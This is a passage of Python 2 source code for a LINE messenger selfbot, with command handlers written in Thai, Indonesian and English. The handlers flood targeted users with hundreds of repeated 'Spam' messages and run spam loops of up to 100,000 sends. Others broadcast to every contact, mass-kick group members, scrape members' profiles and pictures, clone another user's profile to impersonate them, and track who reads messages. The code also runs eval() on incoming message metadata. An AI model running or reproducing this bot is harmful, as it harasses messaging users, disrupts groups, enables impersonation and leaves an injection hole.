msg.toType == 2: bctxt = msg.text.replace("พูด ", "") t = cl.getAllContactIds() t = 5 while(t): cl.sendText(msg.to, (bctxt)) t-=1 elif "Red say " in msg.text: bctxt = msg.text.replace("Red say ","") ki.sendText(msg.to,(bctxt)) elif "siri-en " in msg.text.lower(): query = msg.text.lower().replace("siri-en ","") with requests.session() as s: s.headers['user-agent'] = 'Mozilla/5.0' url = 'https://google-translate-proxy.herokuapp.com/api/tts' params = {'language': 'en', 'speed': '1', 'query': query} r = s.get(url, params=params) mp3 = r.url cl.sendAudioWithUrl(msg.to, mp3) #============================================== elif "รันแชท @" in msg.text: _name = msg.text.replace("รันแชท @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) for g in gs.members: if _nametarget == g.displayName: cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(msg.to, "Done") print " Spammed !" elif msg.text in ["ลบรัน"]: gid = cl.getGroupIdsInvited() for i in gid: cl.rejectGroupInvitation(i) if wait["lang"] == "JP": cl.sendText(msg.to,"ลบห้องเชิญเรียบร้อยแล้ว") elif msg.text in ["ลบแชท","ล้างแชท"]: cl.removeAllMessages(op.param2) cl.sendText(msg.to,"❇️Delete Chat Bot❇️") #==============================================================================# elif msg.text in ["Invite"]: wait["invite"] = True cl.sendText(msg.to,"ส่งคทด้วย") elif msg.text in ["อ่านคท"]: wait["contact"] = True cl.sendText(msg.to,"จัดมาโล๊ด") elif msg.text in ["Like:me","Like me"]: #Semua Bot Ngelike Status Akun Utama print "[Command]Like executed" cl.sendText(msg.to,"Like Status Owner") try: likeme() except: pass elif msg.text in ["Like:friend","Like friend"]: #Semua Bot Ngelike Status Teman print "[Command]Like executed" cl.sendText(msg.to,"Like Status Teman") try: likefriend() except: pass elif msg.text in ["เปิดไลค์","Like on"]: if wait["likeOn"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"จัดไป") else: wait["likeOn"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"จัดไป") elif msg.text in ["ปิดไลค์","Like:off"]: if wait["likeOn"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"ตามนั้น") else: wait["likeOn"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"ตามนั้น") elif msg.text in ["Simisimi on","Simisimi:on"]: settings["simiSimi"][msg.to] = True cl.sendText(msg.to,"เปิดโหมดโต้ตอบ") elif msg.text in ["Simisimi off","Simisimi:off"]: settings["simiSimi"][msg.to] = False cl.sendText(msg.to,"ปิดโหมดโต้ตอบแล้ว") elif msg.text in ["Autoread on","Read:on"]: wait['alwayRead'] = True cl.sendText(msg.to,"Auto read On") elif msg.text in ["Autoread off","Read:off"]: wait['alwayRead'] = False cl.sendText(msg.to,"Auto read Off") elif msg.text in ["Respontag on","Autorespon:on","Respon on","Respon:on"]: wait["detectMention"] = True cl.sendText(msg.to,"Auto respon tag On") elif msg.text in ["Respontag off","Autorespon:off","Respon off","Respon:off"]: wait["detectMention"] = False cl.sendText(msg.to,"Auto respon tag Off") elif msg.text in ["Kicktag on","Autokick:on","Responkick on","Responkick:on"]: wait["kickMention"] = True cl.sendText(msg.to,"Auto Kick tag ON") elif msg.text in ["Kicktag off","Autokick:off","Responkick off","Responkick:off"]: wait["kickMention"] = False cl.sendText(msg.to,"Auto Kick tag OFF") elif "Time" in msg.text: if msg.toType == 2: cl.sendText(msg.to,datetime.today().strftime('%H:%M:%S')) #==============================================================================# elif "Clearall" in msg.text: if msg.toType == 2: if msg.toType == 2: print "ok" _name = msg.text.replace("Clearall","") gs = cl.getGroup(msg.to) gs = cl.getGroup(msg.to) gs = cl.getGroup(msg.to) cl.sendText(msg.to,"Group Cleared.") targets = [] for g in gs.members: if _name in g.displayName: targets.append(g.mid) if targets == []: cl.sendText(msg.to,"Not found.") cl.sendText(msg.to,"Not found.") else: for target in targets: try: klist=[cl,cl,cl] kicker=random.choice(klist) kicker.kickoutFromGroup(msg.to,[target]) print (msg.to,[g.mid]) except: cl.sendText(msg.to,"หาหมอมั้ย") cl.sendText(msg.to,"หาหมอมั้ย") elif ("หวด " in msg.text): targets = [] key = eval(msg.contentMetadata["MENTION"]) key["MENTIONEES"] [0] ["M"] for x in key["MENTIONEES"]: targets.append(x["M"]) for target in targets: try: cl.kickoutFromGroup(msg.to,[target]) except: cl.sendText(msg.to,"Error") elif ("หวัดดี " in msg.text): targets = [] key = eval(msg.contentMetadata["MENTION"]) key["MENTIONEES"] [0] ["M"] for x in key["MENTIONEES"]: targets.append(x["M"]) for target in targets: try: cl.kickoutFromGroup(msg.to,[target]) cl.inviteIntoGroup(msg.to,[target]) cl.cancelGroupInvitation(msg.to,[target]) cl.inviteIntoGroup(msg.to,[target]) except: cl.sendText(msg.to,"Error") elif "Kick: " in msg.text: midd = msg.text.replace("Kick: ","") cl.kickoutFromGroup(msg.to,[midd]) elif 'ดึง' in msg.text.lower(): key = msg.text[-33:] cl.findAndAddContactsByMid(key) cl.inviteIntoGroup(msg.to, [key]) contact = cl.getContact(key) elif msg.text.lower() == 'cancel': if msg.toType == 2: group = cl.getGroup(msg.to) if group.invitee is not None: gInviMids = [contact.mid for contact in group.invitee] cl.cancelGroupInvitation(msg.to, gInviMids) else: if wait["lang"] == "JP": cl.sendText(msg.to,"Tidak ada undangan") else: cl.sendText(msg.to,"Invitan tidak ada") else: if wait["lang"] == "JP": cl.sendText(msg.to,"Tidak ada undangan") else: cl.sendText(msg.to,"Invitan tidak ada") elif msg.text.lower() == 'เปิดลิ้ง': if msg.toType == 2: group = cl.getGroup(msg.to) group.preventJoinByTicket = False cl.updateGroup(group) if wait["lang"] == "JP": cl.sendText(msg.to,"URL open") else: cl.sendText(msg.to,"URL open") else: if wait["lang"] == "JP": cl.sendText(msg.to,"It can not be used outside the group") else: cl.sendText(msg.to,"Can not be used for groups other than") elif msg.text.lower() == 'ปิดลิ้ง': if msg.toType == 2: group = cl.getGroup(msg.to) group.preventJoinByTicket = True cl.updateGroup(group) if wait["lang"] == "JP": cl.sendText(msg.to,"URL close") else: cl.sendText(msg.to,"URL close") else: if wait["lang"] == "JP": cl.sendText(msg.to,"It can not be used outside the group") else: cl.sendText(msg.to,"Can not be used for groups other than") elif msg.text in ["Url","Gurl"]: if msg.toType == 2: g = cl.getGroup(msg.to) if g.preventJoinByTicket == True: g.preventJoinByTicket = False cl.updateGroup(g) gurl = cl.reissueGroupTicket(msg.to) cl.sendText(msg.to,"line://ti/g/" + gurl) elif "Gcreator" == msg.text: try: group = cl.getGroup(msg.to) GS = group.creator.mid M = Message() M.to = msg.to M.contentType = 13 M.contentMetadata = {'mid': GS} cl.sendMessage(M) except: W = group.members[0].mid M = Message() M.to = msg.to M.contentType = 13 M.contentMetadata = {'mid': W} cl.sendMessage(M) cl.sendText(msg.to,"Creator Grup") elif msg.text.lower() == 'ดึง:ผส': if msg.toType == 2: ginfo = cl.getGroup(msg.to) try: gcmid = ginfo.creator.mid except: gcmid = "Error" if wait["lang"] == "JP": cl.inviteIntoGroup(msg.to,[gcmid]) else: cl.inviteIntoGroup(msg.to,[gcmid]) elif ("Gname: " in msg.text): if msg.toType == 2: X = cl.getGroup(msg.to) X.name = msg.text.replace("Gname: ","") cl.updateGroup(X) elif msg.text.lower() == 'infogrup': group = cl.getGroup(msg.to) try: gCreator = group.creator.displayName except: gCreator = "Error" md = "[Nama Grup : ]\n" + group.name + "\n\n[Id Grup : ]\n" + group.id + "\n\n[Pembuat Grup :]\n" + gCreator + "\n\n[Gambar Grup : ]\nhttp://dl.profile.line-cdn.net/" + group.pictureStatus if group.preventJoinByTicket is False: md += "\n\nKode Url : Diizinkan" else: md += "\n\nKode Url : Diblokir" if group.invitee is None: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : 0 Orang" else: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : " + str(len(group.invitee)) + " Orang" cl.sendText(msg.to,md) elif msg.text.lower() == 'grup id': gid = cl.getGroupIdsJoined() h = "" for i in gid: h += "[%s]:%s\n" % (cl.getGroup(i).name,i) cl.sendText(msg.to,h) #==============================================================================# elif msg.text in ["Glist"]: gid = cl.getGroupIdsJoined() h = "" for i in gid: h += "%s\n" % (cl.getGroup(i).name +" ? ["+str(len(cl.getGroup(i).members))+"]") cl.sendText(msg.to,"-- List Groups --\n\n"+ h +"\nTotal groups =" +" ["+str(len(gid))+"]") elif msg.text.lower() == 'gcancel': gid = cl.getGroupIdsInvited() for i in gid: cl.rejectGroupInvitation(i) if wait["lang"] == "JP": cl.sendText(msg.to,"Aku menolak semua undangan") else: cl.sendText(msg.to,"He declined all invitations") elif "Auto add" in msg.text: thisgroup = cl.getGroups([msg.to]) Mids = [contact.mid for contact in thisgroup[0].members] mi_d = Mids[:33] cl.findAndAddContactsByMids(mi_d) cl.sendText(msg.to,"Berhasil add semua") elif "@bye" in msg.text: if msg.toType == 2: ginfo = cl.getGroup(msg.to) try: cl.leaveGroup(msg.to) except: pass #==============================================================================# elif "ใครแทค" == msg.text.lower(): group = cl.getGroup(msg.to) nama = [contact.mid for contact in group.members] nm1, nm2, nm3, nm4, nm5, jml = [], [], [], [], [], len(nama) if jml <= 100: summon(msg.to, nama) if jml > 100 and jml < 200: for i in range(0, 99): nm1 += [nama[i]] summon(msg.to, nm1) for j in range(100, len(nama)-1): nm2 += [nama[j]] summon(msg.to, nm2) if jml > 200 and jml < 500: for i in range(0, 99): nm1 += [nama[i]] summon(msg.to, nm1) for j in range(100, 199): nm2 += [nama[j]] summon(msg.to, nm2) for k in range(200, 299): nm3 += [nama[k]] summon(msg.to, nm3) for l in range(300, 399): nm4 += [nama[l]] summon(msg.to, nm4) for m in range(400, len(nama)-1): nm5 += [nama[m]] summon(msg.to, nm5) if jml > 500: print "Terlalu Banyak Men 500+" cnt = Message() cnt.text = "Jumlah:\n" + str(jml) + " Members" cnt.to = msg.to cl.sendMessage(cnt) elif "Sider on" in msg.text: try: del cctv['point'][msg.to] del cctv['sidermem'][msg.to] del cctv['cyduk'][msg.to] except: pass cctv['point'][msg.to] = msg.id cctv['sidermem'][msg.to] = "" cctv['cyduk'][msg.to]=True wait["Sider"] = True cl.sendText(msg.to,"Siap On Cek Sider") elif "Sider off" in msg.text: if msg.to in cctv['point']: cctv['cyduk'][msg.to]=False wait["Sider"] = False cl.sendText(msg.to, "Cek Sider Off") else: cl.sendText(msg.to, "Heh Belom Di Set") elif "จับ" == msg.text.lower(): if msg.to in wait2['readPoint']: try: del wait2['readPoint'][msg.to] del wait2['readMember'][msg.to] del wait2['setTime'][msg.to] except: pass wait2['readPoint'][msg.to] = msg.id wait2['readMember'][msg.to] = "" wait2['setTime'][msg.to] = datetime.now().strftime('%H:%M:%S') wait2['ROM'][msg.to] = {} with open('sider.json', 'w') as fp: json.dump(wait2, fp, sort_keys=True, indent=4) cl.sendText(msg.to,"จับตาดูคนแอบเรียบร้อย") else: try: del wait2['readPoint'][msg.to] del wait2['readMember'][msg.to] del wait2['setTime'][msg.to] except: pass wait2['readPoint'][msg.to] = msg.id wait2['readMember'][msg.to] = "" wait2['setTime'][msg.to] = datetime.now().strftime('%H:%M:%S') wait2['ROM'][msg.to] = {} with open('sider.json', 'w') as fp: json.dump(wait2, fp, sort_keys=True, indent=4) cl.sendText(msg.to, "จับตาดูคนแอบเรียบร้อย:\n" + datetime.now().strftime('%H:%M:%S')) print wait2 elif "เลิกจับ" == msg.text.lower(): if msg.to not in wait2['readPoint']: cl.sendText(msg.to,"เลิกจับตามองแระ:") else: try: del wait2['readPoint'][msg.to] del wait2['readMember'][msg.to] del wait2['setTime'][msg.to] except: pass cl.sendText(msg.to, "เลิกจับตามองแระ:\n" + datetime.now().strftime('%H:%M:%S')) elif "ขอดู" == msg.text.lower(): if msg.to in wait2['readPoint']: if wait2["ROM"][msg.to].items() == []: cl.sendText(msg.to, "Reader:\nNone") else: chiya = [] for rom in wait2["ROM"][msg.to].items(): chiya.append(rom[1]) cmem = cl.getContacts(chiya) zx = "" zxc = "" zx2 = [] xpesan = '' for x in range(len(cmem)): xname = str(cmem[x].displayName) pesan = '' pesan2 = pesan+"@a\n" xlen = str(len(zxc)+len(xpesan)) xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1) zx = {'S':xlen, 'E':xlen2, 'M':cmem[x].mid} zx2.append(zx) zxc += pesan2 msg.contentType = 0 print zxc msg.text = xpesan+ zxc + "\nBefore: %s\nAfter: %s"%(wait2['setTime'][msg.to],datetime.now().strftime('%H:%M:%S')) lol ={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')} print lol msg.contentMetadata = lol try: cl.sendMessage(msg) except Exception as error: print error pass else: cl.sendText(msg.to, "Lurking has not been set.") elif "Gbroadcast: " in msg.text: bc = msg.text.replace("Gbroadcast: ","") gid = cl.getGroupIdsJoined() for i in gid: cl.sendText(i, bc) elif "Cbroadcast: " in msg.text: bc = msg.text.replace("Cbroadcast: ","") gid = cl.getAllContactIds() for i in gid: cl.sendText(i, bc) elif "Spam change: " in msg.text: wait["spam"] = msg.text.replace("Spam change: ","") cl.sendText(msg.to,"spam changed") elif "Spam add: " in msg.text: wait["spam"] = msg.text.replace("Spam add: ","") if wait["lang"] == "JP": cl.sendText(msg.to,"spam changed") else: cl.sendText(msg.to,"Done") elif "Spam: " in msg.text: strnum = msg.text.replace("Spam: ","") num = int(strnum) for var in range(0,num): cl.sendText(msg.to, wait["spam"]) elif "Spamtag @" in msg.text: _name = msg.text.replace("Spamtag @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) for g in gs.members: if _nametarget == g.displayName: xname = g.displayName xlen = str(len(xname)+1) msg.contentType = 0 msg.text = "@"+xname+" " msg.contentMetadata ={'MENTION':'{"MENTIONEES":[{"S":"0","E":'+json.dumps(xlen)+',"M":'+json.dumps(g.mid)+'}]}','EMTVER':'4'} cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) else: pass elif "Spam" in msg.text: txt = msg.text.split(" ") jmlh = int(txt[2]) teks = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+" ","") tulisan = jmlh * (teks+"\n") if txt[1] == "on": if jmlh <= 100000: for x in range(jmlh): cl.sendText(msg.to, teks) else: cl.sendText(msg.to, "Out of Range!") elif txt[1] == "off": if jmlh <= 100000: cl.sendText(msg.to, tulisan) else: cl.sendText(msg.to, "Out Of Range!") elif ("Micadd " in msg.text): targets = [] key = eval(msg.contentMetadata["MENTION"]) key["MENTIONEES"][0]["M"] for x in key["MENTIONEES"]: targets.append(x["M"]) for target in targets: try: mimic["target"][target] = True cl.sendText(msg.to,"Target ditambahkan!") break except: cl.sendText(msg.to,"Fail !") break elif ("Micdel " in msg.text): targets = [] key = eval(msg.contentMetadata["MENTION"]) key["MENTIONEES"][0]["M"] for x in key["MENTIONEES"]: targets.append(x["M"]) for target in targets: try: del mimic["target"][target] cl.sendText(msg.to,"Target dihapuskan!") break except: cl.sendText(msg.to,"Fail !") break elif msg.text in ["Miclist"]: if mimic["target"] == {}: cl.sendText(msg.to,"nothing") else: mc = "Target mimic user\n" for mi_d in mimic["target"]: mc += "?? "+cl.getContact(mi_d).displayName + "\n" cl.sendText(msg.to,mc) elif "Mimic target " in msg.text: if mimic["copy"] == True: siapa = msg.text.replace("Mimic target ","") if siapa.rstrip(' ') == "me": mimic["copy2"] = "me" cl.sendText(msg.to,"Mimic change to me") elif siapa.rstrip(' ') == "target": mimic["copy2"] = "target" cl.sendText(msg.to,"Mimic change to target") else: cl.sendText(msg.to,"I dont know") elif "Mimic " in msg.text: cmd = msg.text.replace("Mimic ","") if cmd == "on": if mimic["status"] == False: mimic["status"] = True cl.sendText(msg.to,"Reply Message on") else: cl.sendText(msg.to,"Sudah on") elif cmd == "off": if mimic["status"] == True: mimic["status"] = False cl.sendText(msg.to,"Reply Message off") else: cl.sendText(msg.to,"Sudah off") elif "Setimage: " in msg.text: wait["pap"] = msg.text.replace("Setimage: ","") cl.sendText(msg.to, "Pap telah di Set") elif msg.text in ["Papimage","Papim","Pap"]: cl.sendImageWithURL(msg.to,wait["pap"]) elif "Setvideo: " in msg.text: wait["pap"] = msg.text.replace("Setvideo: ","") cl.sendText(msg.to,"Video Has Ben Set To") elif msg.text in ["Papvideo","Papvid"]: cl.sendVideoWithURL(msg.to,wait["pap"]) elif "TL:" in msg.text: if msg.toType == 2: tl_text = msg.text.replace("TL:","") cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"]) #==============================================================================# elif msg.text.lower() == 'mymid': cl.sendText(msg.to,mid) elif "Timeline: " in msg.text: tl_text = msg.text.replace("Timeline: ","") cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"]) elif "Myname: " in msg.text: string = msg.text.replace("Myname: ","") if len(string.decode('utf-8')) <= 10000000000: profile = cl.getProfile() profile.displayName = string cl.updateProfile(profile) cl.sendText(msg.to,"Changed " + string + "") elif "Mybio: " in msg.text: string = msg.text.replace("Mybio: ","") if len(string.decode('utf-8')) <= 10000000000: profile = cl.getProfile() profile.statusMessage = string cl.updateProfile(profile) cl.sendText(msg.to,"Changed " + string) elif msg.text in ["Myname"]: h = cl.getContact(mid) cl.sendText(msg.to,"===[DisplayName]===\n" + h.displayName) elif msg.text in ["Mybio"]: h = cl.getContact(mid) cl.sendText(msg.to,"===[StatusMessage]===\n" + h.statusMessage) elif msg.text in ["Mypict"]: h = cl.getContact(mid) cl.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus) elif msg.text in ["Myvid"]: h = cl.getContact(mid) cl.sendVideoWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus) elif msg.text in ["Urlpict"]: h = cl.getContact(mid) cl.sendText(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus) elif msg.text in ["Mycover"]: h = cl.getContact(mid) cu = cl.channel.getCover(mid) path = str(cu) cl.sendImageWithURL(msg.to, path) elif msg.text in ["Urlcover"]: h = cl.getContact(mid) cu = cl.channel.getCover(mid) path = str(cu) cl.sendText(msg.to, path) elif "Getmid @" in msg.text: _name = msg.text.replace("Getmid @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) for g in gs.members: if _nametarget == g.displayName: cl.sendText(msg.to, g.mid) else: pass elif "สอดแนม" in msg.text: key = eval(msg.contentMetadata["MENTION"]) key1 = key["MENTIONEES"][0]["M"] contact = cl.getContact(key1) cu = cl.channel.getCover(key1) try: cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + contact.mid + "\n\nBio :\n" + contact.statusMessage + "\n\nProfile Picture :\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n\nHeader :\n" + str(cu)) except: cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + contact.mid + "\n\nBio :\n" + contact.statusMessage + "\n\nProfile Picture :\n" + str(cu)) elif "ส่องตัส" in msg.text: key = eval(msg.contentMetadata["MENTION"]) key1 = key["MENTIONEES"][0]["M"] contact = cl.getContact(key1) cu = cl.channel.getCover(key1) try: cl.sendText(msg.to, "===[StatusMessage]===\n" + contact.statusMessage) except: cl.sendText(msg.to, "===[StatusMessage]===\n" + contact.statusMessage) elif "ส่องชื่อ" in msg.text: key = eval(msg.contentMetadata["MENTION"]) key1 = key["MENTIONEES"][0]["M"] contact = cl.getContact(key1) cu = cl.channel.getCover(key1) try: cl.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName) except: cl.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName) elif "ส่องโปรไฟล" in msg.text: key = eval(msg.contentMetadata["MENTION"]) key1 = key["MENTIONEES"][0]["M"] contact = cl.getContact(key1) cu = cl.channel.getCover(key1) path = str(cu) image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus try: cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage) cl.sendText(msg.to,"Profile Picture " + contact.displayName) cl.sendImageWithURL(msg.to,image) cl.sendText(msg.to,"Cover " + contact.displayName) cl.sendImageWithURL(msg.to,path) except: pass elif "ส่องคท" in msg.text: key = eval(msg.contentMetadata["MENTION"]) key1 = key["MENTIONEES"][0]["M"] mmid = cl.getContact(key1) msg.contentType = 13 msg.contentMetadata = {"mid": key1} cl.sendMessage(msg) elif "ส่องรูป @" in msg.text: print "[Command]dp executing" _name = msg.text.replace("ส่องรูป @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) targets = [] for g in gs.members: if _nametarget == g.displayName: targets.append(g.mid) if targets == []: cl.sendText(msg.to,"Contact not found") else: for target in targets: try: contact = cl.getContact(target) path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus cl.sendImageWithURL(msg.to, path) except Exception as e: raise e print "[Command]dp executed" elif "Getvid @" in msg.text: print "[Command]dp executing" _name = msg.text.replace("Getvid @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) targets = [] for g in gs.members: if _nametarget == g.displayName: targets.append(g.mid) if targets == []: cl.sendText(msg.to,"Contact not found") else: for target in targets: try: contact = cl.getContact(target) path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus cl.sendVideoWithURL(msg.to, path) except Exception as e: raise e print "[Command]dp executed" elif "Picturl @" in msg.text: print "[Command]dp executing" _name = msg.text.replace("Picturl @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) targets = [] for g in gs.members: if _nametarget == g.displayName: targets.append(g.mid) if targets == []: cl.sendText(msg.to,"Contact not found") else: for target in targets: try: contact = cl.getContact(target) path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus cl.sendText(msg.to, path) except Exception as e: raise e print "[Command]dp executed" elif "Getcover @" in msg.text: print "[Command]cover executing" _name = msg.text.replace("Getcover @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) targets = [] for g in gs.members: if _nametarget == g.displayName: targets.append(g.mid) if targets == []: cl.sendText(msg.to,"Contact not found") else: for target in targets: try: contact = cl.getContact(target) cu = cl.channel.getCover(target) path = str(cu) cl.sendImageWithURL(msg.to, path) except Exception as e: raise e print "[Command]cover executed" elif "Coverurl @" in msg.text: print "[Command]cover executing" _name = msg.text.replace("Coverurl @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) targets = [] for g in gs.members: if _nametarget == g.displayName: targets.append(g.mid) if targets == []: cl.sendText(msg.to,"Contact not found") else: for target in targets: try: contact = cl.getContact(target) cu = cl.channel.getCover(target) path = str(cu) cl.sendText(msg.to, path) except Exception as e: raise e print "[Command]cover executed" elif "Getgrup image" in msg.text: group = cl.getGroup(msg.to) path = "http://dl.profile.line-cdn.net/" + group.pictureStatus cl.sendImageWithURL(msg.to,path) elif "Urlgrup image" in msg.text: group = cl.getGroup(msg.to) path = "http://dl.profile.line-cdn.net/" + group.pictureStatus cl.sendText(msg.to,path) elif "Copy @" in msg.text: if msg.toType == 2: print "[COPY] Ok" _name = msg.text.replace("Copy @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) targets = [] for g in gs.members: if _nametarget == g.displayName: targets.append(g.mid) if targets == []: sendMessage(msg.to, "Not Found...") else: for target in targets: try: cl.cloneContactProfile(target) except Exception as e: print e elif "coppy @" in msg.text: print "[COPY] Ok" _name = msg.text.replace("coppy @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) targets = [] for g in gs.members: if _nametarget == g.displayName: targets.append(g.mid) if targets == []: cl.sendText(msg.to, "Not Found...") else: for target in targets: try: cl.CloneContactProfile(target) cl.sendText(msg.to, "เลียนแบบสำเร็จ") except Exception as e: print e elif msg.text in ["Mybackup","คืนร่าง"]: try: cl.updateDisplayPicture(backup.pictureStatus) cl.updateProfile(backup) cl.sendText(msg.to, "คืนร่างเรียบร้อย") except Exception as e: cl.sendText(msg.to, str(e)) #==============================================================================# elif "Fancytext: " in msg.text: txt = msg.text.replace("Fancytext: ", "") cl.kedapkedip(msg.to,txt) print "[Command] Kedapkedip" 